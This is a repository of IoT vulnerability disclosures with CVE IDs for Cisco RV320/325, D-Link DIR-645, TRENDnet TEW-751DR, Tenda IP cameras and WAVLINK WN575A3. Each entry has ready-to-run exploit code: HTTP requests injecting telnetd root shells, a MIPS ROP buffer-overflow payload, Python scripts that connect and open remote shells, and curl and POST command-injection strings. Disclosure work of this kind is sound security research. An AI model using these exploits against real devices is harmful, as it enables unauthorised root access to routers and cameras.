├── Cisco └── Cisco RV32X │ ├── README.md │ └── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ └── 4.png ├── D-Link └── DIR-645 │ ├── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── 5.png │ └── readme.md ├── README.md ├── TRENDnet └── TEW751 │ ├── bufferoverflow.md │ └── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ └── shell.png ├── Tenda └── IPC │ ├── README.md │ └── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ └── 7.png └── WAVLINK └── WN575A3 ├── Readme.md └── img ├── 1.png ├── 2.png ├── 3.png ├── 4.png ├── 5.png ├── 6.png └── 7.png /Cisco/Cisco RV32X/README.md: -------------------------------------------------------------------------------- 1 | CVE-id: CVE-2023-20124 2 | 3 | Vendor's disclosure and acknowledgement: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv01x_rv32x_rce-nzAGWWDD 4 | 5 | # Information 6 | 7 | **Vendor of the products:** Cisco 8 | 9 | **Vendor's website:** https://www.cisco.com 10 | 11 | **Reported by:** FeiXincheng([FXC030618@outlook.com](mailto:FXC030618@outlook.com)) && ShaLetian([ltsha@njupt.edu.cn](mailto:ltsha@njupt.edu.cn)) 12 | 13 | **Affected products:** 14 | 15 | Cisco RV320 Dual Gigabit WAN VPN Router 16 | 17 | Cisco RV325 Dual Gigabit WAN VPN Router 18 | 19 | **Affected firmware version:** 20 | 21 | 1.5.1.13 (the latest release version) 22 | 23 | **Firmware download address:** 24 | 25 | https://software.cisco.com/download/home/284005936/type/282465789/release/1.5.1.13 26 | 27 | # Overview 28 | 29 | **Cisco RV32x Series VPN Routers** were detected with a command injection vulnerability .The vulnerability is caused by lax verification of user input. An authenticated attacker can send crafted requests to the web-based management interface. Successful exploits could allow the attacker to execute arbitrary commands on remote devices. 30 | 31 | # Vulnerability details 32 | 33 | The vulnerability was detected in the `ssi.cgi` binary. 34 | 35 | In the **NK_UiSetPassword** function, first we need to bypass some checks by inputing the right passwd and seting the **submitStatus** value. 36 | 37 | ![1](./img/1.png) 38 | 39 | And then, we can control **local_2c0**. 40 | 41 | ![2](./img/2.png) 42 | 43 | Finally ,it can be passed to **system**. Although **local_2c0** will be checked before **system**, i think it ignores **\n**. As a result, it can lead to a **command inject**. 44 | 45 | ![3](./img/3.png) 46 | 47 | Above all, here is a remote command execution vulnerability. The attacker can inject arbitrary commands after the**\n** in the **nUser** of the POST request message and execute them. 48 | 49 | # Poc 50 | 51 | Send the following POST request message 52 | 53 | ``` 54 | POST /password.htm HTTP/1.1 55 | Host: 192.168.1.1 56 | Cookie: mlap=4zcoqrxD+KTbtDfDTuIWCA== 57 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 58 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 59 | Accept-Language: en-US,en;q=0.5 60 | Accept-Encoding: gzip, deflate 61 | Content-Type: application/x-www-form-urlencoded 62 | Content-Length: 411 63 | Origin: https://192.168.1.1 64 | Referer: https://192.168.1.1/password.htm 65 | Upgrade-Insecure-Requests: 1 66 | Sec-Fetch-Dest: iframe 67 | Sec-Fetch-Mode: navigate 68 | Sec-Fetch-Site: same-origin 69 | Sec-Fetch-User: ?1 70 | Te: trailers 71 | Connection: close 72 | 73 | page=password.htm&submitStatus=1&log_ch=1&check_aging_time=0¤t_username=cisco&PdAgingTime_open_flag=0&nnUser=cisco&nUser=cis%0Atelnetd%20-p%202222%20-l%20%2Fbin%2Fsh%0A&oPass=123456&md5_old_pass=bbd5a14a86bbdc390e4370ad8525d9eb&md5_new_pass=066bae9070a9a95b3e03019db131cd40&auth_key=1964300002&nPass=cisco&cPass=cisco&PdStrength=&PdAgingDate=0&PDlength=8&PDclass=3&PDdifferent=0&EnableAge=0&idletimeout=10 74 | ``` 75 | 76 | # Attack Demo 77 | 78 | After the attack is completed, we successfully logged into the device remotely and got the **root** shell of the device 79 | 80 | ![image-20230119212351774](./img/4.png) 81 | 82 | # exp 83 | 84 | ```python 85 | import os 86 | import requests 87 | 88 | cookies = { 89 | 'mlap': 's/a8YMD2yjnpaHzgm/mnJg==', 90 | } 91 | 92 | headers = { 93 | 'Host': '192.168.1.1', 94 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0', 95 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 96 | 'Accept-Language': 'en-US,en;q=0.5', 97 | 'Content-Type': 'application/x-www-form-urlencoded', 98 | 'Origin': 'https://192.168.1.1', 99 | 'Referer': 'https://192.168.1.1/password.htm', 100 | 'Upgrade-Insecure-Requests': '1', 101 | 'Sec-Fetch-Dest': 'iframe', 102 | 'Sec-Fetch-Mode': 'navigate', 103 | 'Sec-Fetch-Site': 'same-origin', 104 | 'Sec-Fetch-User': '?1', 105 | 'Connection': 'close', 106 | } 107 | 108 | data = 'page=password.htm&submitStatus=1&log_ch=1&check_aging_time=0¤t_username=cisco&PdAgingTime_open_flag=0&nnUser=cisco&nUser=cisco%0Atelnetd%20-p%202222%20-l%20%2Fbin%2Fsh%0A&oPass=123456&md5_old_pass=bbd5a14a86bbdc390e4370ad8525d9eb&md5_new_pass=066bae9070a9a95b3e03019db131cd40&auth_key=1964300002&nPass=cisco&cPass=cisco&PdStrength=&PdAgingDate=0&PDlength=8&PDclass=3&PDdifferent=0&EnableAge=0&idletimeout=10' 109 | 110 | 111 | if __name__ == "__main__": 112 | 113 | requests.packages.urllib3.disable_warnings() 114 | print("[+] Send payload to 192.168.1.1 ...") 115 | response = requests.post('https://192.168.1.1/password.htm', cookies=cookies, headers=headers, data=data, verify=False, timeout=1) 116 | 117 | print("[+] Connect to 192.168.1.1 8888") 118 | os.system("telnet 192.168.1.1 8888") 119 | 120 | ``` 121 | 122 | -------------------------------------------------------------------------------- /Cisco/Cisco RV32X/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Cisco/Cisco RV32X/img/1.png -------------------------------------------------------------------------------- /Cisco/Cisco RV32X/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Cisco/Cisco RV32X/img/2.png -------------------------------------------------------------------------------- /Cisco/Cisco RV32X/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Cisco/Cisco RV32X/img/3.png -------------------------------------------------------------------------------- /Cisco/Cisco RV32X/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Cisco/Cisco RV32X/img/4.png -------------------------------------------------------------------------------- /D-Link/DIR-645/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/D-Link/DIR-645/img/1.png -------------------------------------------------------------------------------- /D-Link/DIR-645/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/D-Link/DIR-645/img/2.png -------------------------------------------------------------------------------- /D-Link/DIR-645/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/D-Link/DIR-645/img/3.png -------------------------------------------------------------------------------- /D-Link/DIR-645/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/D-Link/DIR-645/img/4.png -------------------------------------------------------------------------------- /D-Link/DIR-645/img/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/D-Link/DIR-645/img/5.png -------------------------------------------------------------------------------- /D-Link/DIR-645/readme.md: -------------------------------------------------------------------------------- 1 | Vendor of the products:D-Link 2 | 3 | Reported by:    WangJincheng(wjcwinmt@outlook.com) && FeiXincheng(FXC030618@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m 4 | 5 | Affected products:D-Link DIR-645 <= v1.03 6 | 7 | Vendor Homepage: https://www.dlink.com/en/consumer 8 | 9 | Vendor Advisory: https://tsd.dlink.com.tw/ddgo 10 | 11 | CVE_ID:[CVE-2022-32092](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32092) 12 | 13 | 14 | # summarize 15 | 16 | `D-Link DIR-645` was discovered to contain a command injection vulnerability when operate the file `__ajax_explorer.sgi`. This vulnerability allows attackers to execute arbitrary commands via the `QUERY_STRING` parameter. 17 | 18 | # Vulnerability description 19 | 20 | We can see that the os will get `QUERY_STRING` in `scandir_main`, and pass it to `sub_410AD4` 21 | 22 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/1.png) 23 | 24 | In `sub_410AD4`, it calls `sub_410434` 25 | 26 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/2.png) 27 | 28 | In `sub_410434`, it contains a command injection. 29 | 30 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/3.png) 31 | 32 | before the attack 33 | 34 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/4.png) 35 | 36 | after the attack 37 | 38 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/D-Link/DIR-645/img/5.png) 39 | 40 | # poc 41 | 42 | curl "http://192.168.0.1/portal/__ajax_explorer.sgi?action=umnt&path=path&where=here&en=;echo%20X1cT34mpwner%20>FXC;" 43 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # iot-vul 2 | 3 | ### CNVD 4 | #### Dlink 5 | CNVD-2022-38324 DOS 6 | 7 | CNVD-2022-47126 Command Injection 8 | 9 | CNVD-2022-47133 Command Injection 10 | 11 | #### TRENDnet 12 | 13 | CNVD-2022-38121 RCE 14 | 15 | #### H3C 16 | 17 | CNVD-2022-48622 DOS 18 | 19 | CNVD-2022-48624 DOS 20 | 21 | #### Tenda 22 | 23 | CNVD-2022-48620 Command Injection 24 | 25 | CNVD-2022-50401 DOS 26 | 27 | #### TP-Link 28 | 29 | CNVD-2022-50083 DOS 30 | 31 | CNVD-2022-50402 DOS 32 | 33 | #### Totolink 34 | 35 | CNVD-2022-50687 Command Injection 36 | 37 | CNVD-2022-50688 Command Injection 38 | 39 | #### WAVLINK 40 | 41 | CNVD-2022-53809 Command Injection 42 | 43 | ### CVE 44 | 45 | #### D-Link 46 | CVE-2022-32092 Command Injection 47 | 48 | CVE-2022-30521 Command Injection 49 | 50 | #### TRENDnet 51 | 52 | CVE-2022-33007 Command Injection 53 | 54 | #### WAVLINK 55 | 56 | CVE-2022-37149 Command Injection 57 | 58 | #### Tenda IPC 59 | 60 | CVE-2023-23080 RCE 61 | 62 | #### Cisco 63 | 64 | CVE-2023-20124 RCE 65 | 66 | https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv01x_rv32x_rce-nzAGWWDD 67 | -------------------------------------------------------------------------------- /TRENDnet/TEW751/bufferoverflow.md: -------------------------------------------------------------------------------- 1 | Vendor of the products:TRENDnet 2 | 3 | Reported by:    FeiXincheng && WangJincheng from X1cT34m 4 | 5 | Affected products: TRENDnet TEW751DR <= v1.03 , TRENDnet TEW-752DRU <= v1.03 6 | 7 | Vendor Homepage: https://www.trendnet.com/ 8 | 9 | Vendor Advisory: https://www.trendnet.com/support/support-detail.asp?prod=165_TEW-751DR , 10 | https://www.trendnet.com/support/support-detail.asp?prod=170_TEW-752DRU 11 | 12 | CVE_ID:[CVE-2022-33007](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33007) 13 | 14 | # summarize 15 | 16 | The LAN-side Web-Configuration Interface has Stack-based Buffer Overflow vulnerability in the `TrendNet` Wi-Fi router firmware `TEW751DR` `TEW-752DRU` . In the `genacgi_main` function of the `cgibin` program, the `sprintf` method directly uses the service parameter from `/gena.cgi`. The attackers can construct a payload to carry out arbitrary code attacks. 17 | 18 | # vulnerability description 19 | 20 | There is a `stack overflow` vulnerability in the `genacgi_main` function. 21 | 22 | ![image-20220316191407126](https://github.com/fxc233/CVE/blob/main/img/1.png) 23 | 24 | It calls the `sub_40EC1C` function. 25 | 26 | ![image-20220316191407126](https://github.com/fxc233/CVE/blob/main/img/2.png) 27 | 28 | However, in the `sub_40EC1C` function, it calls the `sprintf` function from `a1` to `v23` without any security check, which causes the stack overflow. 29 | 30 | ![image-20220316191407126](https://github.com/fxc233/CVE/blob/main/img/3.png) 31 | 32 | 33 | # poc 34 | 35 | # python3 36 | from pwn import * 37 | from socket import * 38 | from os import * 39 | from time import * 40 | context(os = 'linux', arch = 'mips') 41 | 42 | libc_base = 0x2aaf8000 43 | 44 | s = socket(AF_INET, SOCK_STREAM) 45 | 46 | cmd = b'telnetd -p 7777;' 47 | payload = b'a'*462 48 | payload += p32(libc_base + 0x53200 - 1) # s0 system_addr - 1 49 | payload += p32(libc_base + 0x169C4) # s1 addiu $s2, $sp, 0x18 (=> jalr $s0) 50 | payload += b'a'*4 # s2 51 | payload += p32(libc_base + 0x32A98) # ra addiu $s0, 1 (=> jalr $s1) 52 | payload += b'a'*0x18 # padding 53 | payload += cmd 54 | 55 | msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n" 56 | msg += b"Host: localhost:49152\r\n" 57 | msg += b"SID: 1\r\n\r\n" 58 | 59 | s.connect((gethostbyname("192.168.10.1"), 49152)) 60 | s.send(msg) 61 | 62 | sleep(1) 63 | system("telnet 192.168.10.1 7777") 64 | 65 | 66 | ![image-20220316191407126](https://github.com/fxc233/CVE/blob/main/img/shell.png?raw=true) 67 | -------------------------------------------------------------------------------- /TRENDnet/TEW751/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/TRENDnet/TEW751/img/1.png -------------------------------------------------------------------------------- /TRENDnet/TEW751/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/TRENDnet/TEW751/img/2.png -------------------------------------------------------------------------------- /TRENDnet/TEW751/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/TRENDnet/TEW751/img/3.png -------------------------------------------------------------------------------- /TRENDnet/TEW751/img/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/TRENDnet/TEW751/img/shell.png -------------------------------------------------------------------------------- /Tenda/IPC/README.md: -------------------------------------------------------------------------------- 1 | # Information 2 | 3 | #### CVE ID: CVE-2023-23080 4 | 5 | #### Vendor of the products: 6 | 7 | Tenda 8 | 9 | #### Reported by: 10 | 11 | FeiXincheng(FXC030618@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m 12 | 13 | #### Affected products: 14 | 15 | Tenda CP7, Tenda CP3 v.10,Tenda IT7-PCS,Tenda IT7-LCS,Tenda IT7-PRS,Tenda IT7-LRS,Tenda IC7-LRS,Tenda IC7-PRS,Tenda IT6-PCS,Tenda IT6-LCS,Tenda IT6-PRS,Tenda IC6-LRS,Tenda IC6-PRS,Tenda IT6-LRS 16 | 17 | #### Affected firmware version: 18 | 19 | Tenda CP7<=V11.10.00.2211041403 20 | 21 | Tenda CP3 v.10<=V20220906024_2025 22 | 23 | Tenda IT7-PCS<=V2209020914 24 | 25 | Tenda IT7-LCS<=V2209020914 26 | 27 | Tenda IT7-PRS<=V2209020908 28 | 29 | Tenda IT7-LRS<=V2209020908_0909 30 | 31 | Tenda IC7-LRS<=2209020910 32 | 33 | Tenda IC7-PRS<=2209020910 34 | 35 | Tenda IT6-PCS<=2209020915 36 | 37 | Tenda IT6-LCS<=2209020915 38 | 39 | Tenda IT6-PRS<=2209020911 40 | 41 | Tenda IC6-LRS<=2209020912 42 | 43 | Tenda IC6-PRS<=2209020912 44 | 45 | Tenda IT6-LRS<=2209020911 46 | 47 | #### Vendor Homepage: 48 | 49 | https://www.tenda.com.cn/ 50 | 51 | #### Vendor Advisory: 52 | 53 | https://www.tenda.com.cn/product/download/CP7.html 54 | 55 | https://www.tenda.com.cn/download/detail-3472.html 56 | 57 | https://www.tenda.com.cn/download/detail-3471.html 58 | 59 | https://www.tenda.com.cn/download/detail-3470.html 60 | 61 | https://www.tenda.com.cn/download/detail-3466.html 62 | 63 | https://www.tenda.com.cn/download/detail-3467.html 64 | 65 | https://www.tenda.com.cn/download/detail-3463.htmll 66 | 67 | https://www.tenda.com.cn/download/detail-3478.html 68 | 69 | https://www.tenda.com.cn/download/detail-3469.html 70 | 71 | https://www.tenda.com.cn/download/detail-3464.html 72 | 73 | https://www.tenda.com.cn/download/detail-3466.html 74 | 75 | https://www.tenda.com.cn/download/detail-3461.html 76 | 77 | https://www.tenda.com.cn/download/detail-3462.html 78 | 79 | https://www.tenda.com.cn/download/detail-3465.html 80 | 81 | # Summarize 82 | 83 | `Tenda IPC` was discovered to contain a command injection vulnerability in port `1300`.This vulnerability allows attackers to execute arbitrary commands. 84 | 85 | # Vulnerability details 86 | 87 | The vulnerability is in port `1300`. 88 | 89 | At first, from the `start`entry enters, and then the `sub_11924` function is executed. 90 | 91 | ![image-20220316191407126](./img/1.png) 92 | 93 | In the function `sub_11924`, we find that we can controll the content, and then we can execute the `sub_14404` function. 94 | 95 | ![image-20220316191407126](./img/2.png) 96 | 97 | In the function `sub_14404`, the content will be passed to `sub_16E04`. 98 | 99 | ![image-20220316191407126](./img/3.png) 100 | 101 | In the function `sub_16E04`,we find that dangerous function `popen` appear. And we can achieve a code excute. 102 | 103 | ![image-20220316191407126](./img/4.png) 104 | 105 | 106 | 107 | # poc 108 | 109 | for example: python3 exploit.py 192.168.2.106 8888 110 | 111 | ```python 112 | from time import sleep 113 | import requests 114 | import socket 115 | import sys 116 | import os 117 | 118 | 119 | if __name__ == "__main__": 120 | TARGET_IP = sys.argv[1] 121 | SHELL_PORT = sys.argv[2] 122 | 123 | SHELL_OPERATION = "telnetd -p %s -l /bin/sh &" % SHELL_PORT 124 | 125 | print("\x1b[01;38;5;214m[+] Connect to target ip\x1b[0m") 126 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 127 | s.connect((TARGET_IP,1300)) 128 | sleep(0.5) 129 | 130 | print("[+] Sending payload to %s ..." % TARGET_IP) 131 | s.send(SHELL_OPERATION.encode()) 132 | 133 | s.recv(1024) 134 | sleep(1) 135 | 136 | print("\x1b[01;38;5;1m[+] Successfully connect to Port %s\x1b[0m" % SHELL_PORT) 137 | os.system("telnet %s %s" % (TARGET_IP,SHELL_PORT)) 138 | 139 | s.close() 140 | 141 | ``` 142 | 143 | #### Before attack 144 | 145 | ![image-20220316191407126](./img/5.png) 146 | 147 | #### After attack 148 | 149 | ![image-20220316191407126](./img/6.png) 150 | 151 | ![image-20220316191407126](./img/7.png) 152 | -------------------------------------------------------------------------------- /Tenda/IPC/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Tenda/IPC/img/1.png -------------------------------------------------------------------------------- /Tenda/IPC/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Tenda/IPC/img/2.png -------------------------------------------------------------------------------- /Tenda/IPC/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Tenda/IPC/img/3.png -------------------------------------------------------------------------------- /Tenda/IPC/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Tenda/IPC/img/4.png -------------------------------------------------------------------------------- /Tenda/IPC/img/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Tenda/IPC/img/5.png -------------------------------------------------------------------------------- /Tenda/IPC/img/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Tenda/IPC/img/6.png -------------------------------------------------------------------------------- /Tenda/IPC/img/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/Tenda/IPC/img/7.png -------------------------------------------------------------------------------- /WAVLINK/WN575A3/Readme.md: -------------------------------------------------------------------------------- 1 | # Information 2 | 3 | Vendor of the products:WAVLINK 4 | 5 | Reported by: FeiXincheng(FXC030618@outlook.com) && WangJincheng(wjcwinmt@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m 6 | 7 | Affected products:WAVLINK WL-WN575A3 8 | 9 | Affected firmware version: RPT75A3.V4300.201217 10 | 11 | Vendor Homepage: https://www.wavlink.com/en_us 12 | 13 | Vendor Advisory: https://www.wavlink.com/en_us/firmware/details/fac744bd61.html 14 | 15 | CVE_ID:CVE-2022-37149 16 | 17 | # Summarize 18 | 19 | `WAVLINK WL-WN575A3` was discovered to contain a command injection vulnerability when operate the file `adm.cgi`. This vulnerability allows attackers to execute arbitrary commands via the `username` parameter. 20 | 21 | # Show the product 22 | 23 | `Wavlink WL-WN575A3` s a AC1200 Dual-band Wi-Fi Range Extender. The test version here is `RPT75A3.V4300.201217` 24 | 25 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/1.png) 26 | 27 | # Vulnerability details 28 | 29 | The vulnerability is detected at `/etc_ro/lighttpd/www/cgi-bin/adm.cgi` 30 | 31 | At first, from the `_start`entry enters, and then the `ftext` function is executed. 32 | 33 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/2.png) 34 | 35 | In the function `ftext`, we find that we can controll the content of `page` field is `sysinit`, we can execute the `set_sys_init` function. 36 | 37 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/3.png) 38 | 39 | In the function `set_sys_init`, the program uses function `web_get` to obtain the content of parameter `username` , `newpass` which are sent by `POST` request. Then, when `newpass!= 0`, the content username is formatted into a string passed as an argument to the function `do_system` which can execute system commands. 40 | 41 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/4.png) 42 | 43 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/5.png) 44 | 45 | 46 | 47 | # poc 48 | 49 | Send the following to the URL `http://wifi.wavlink.com/cgi-bin/adm.cgi` by `POST` request. 50 | 51 | ``` 52 | page=sysinit&username=fxc`ls>/etc_ro/lighttpd/www/fxc.html` 53 | ``` 54 | 55 | #### Before attack 56 | 57 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/6.png) 58 | 59 | #### After attack 60 | 61 | ![image-20220316191407126](https://github.com/fxc233/iot-vul/blob/main/WAVLINK/WN575A3/img/7.png) 62 | -------------------------------------------------------------------------------- /WAVLINK/WN575A3/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/WAVLINK/WN575A3/img/1.png -------------------------------------------------------------------------------- /WAVLINK/WN575A3/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/WAVLINK/WN575A3/img/2.png -------------------------------------------------------------------------------- /WAVLINK/WN575A3/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/WAVLINK/WN575A3/img/3.png -------------------------------------------------------------------------------- /WAVLINK/WN575A3/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/WAVLINK/WN575A3/img/4.png -------------------------------------------------------------------------------- /WAVLINK/WN575A3/img/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/WAVLINK/WN575A3/img/5.png -------------------------------------------------------------------------------- /WAVLINK/WN575A3/img/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/WAVLINK/WN575A3/img/6.png -------------------------------------------------------------------------------- /WAVLINK/WN575A3/img/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/fxc233/iot-vul/f3d114412c8360e1732c79e1f98f0ba7a93701ec/WAVLINK/WN575A3/img/7.png --------------------------------------------------------------------------------